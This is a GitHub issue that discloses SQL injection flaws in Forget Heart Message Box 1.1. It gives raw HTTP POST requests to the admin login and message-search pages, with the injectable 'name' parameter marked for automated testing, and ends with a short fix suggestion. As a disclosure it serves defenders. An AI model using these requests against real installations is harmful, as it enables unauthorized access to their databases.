Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Forget Heart Message Box 1.1 has multiple SQL injections #1

Open
sunset-move opened this issue Jan 16, 2023 · 0 comments
Open

Forget Heart Message Box 1.1 has multiple SQL injections #1

sunset-move opened this issue Jan 16, 2023 · 0 comments

Comments

@sunset-move
Copy link

sunset-move commented Jan 16, 2023

Forget Heart Message Box 1.1 has multiple SQL injections

Vulnerability Type :

SQL Injection

Vulnerability Version :

1.1

Recurring environment:

  • Windows 10
  • PHP 7.3.4
  • Apache 2.4.43

Vulnerability Description AND recurrence:

Vulnerability Documentation:adminpost.php

image

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232*&pass=123456

image
image

Vulnerability Documentation:cha.php

Parameter: name

image

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

image

Restoration suggestions

Filtering of user input or using magic methods.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant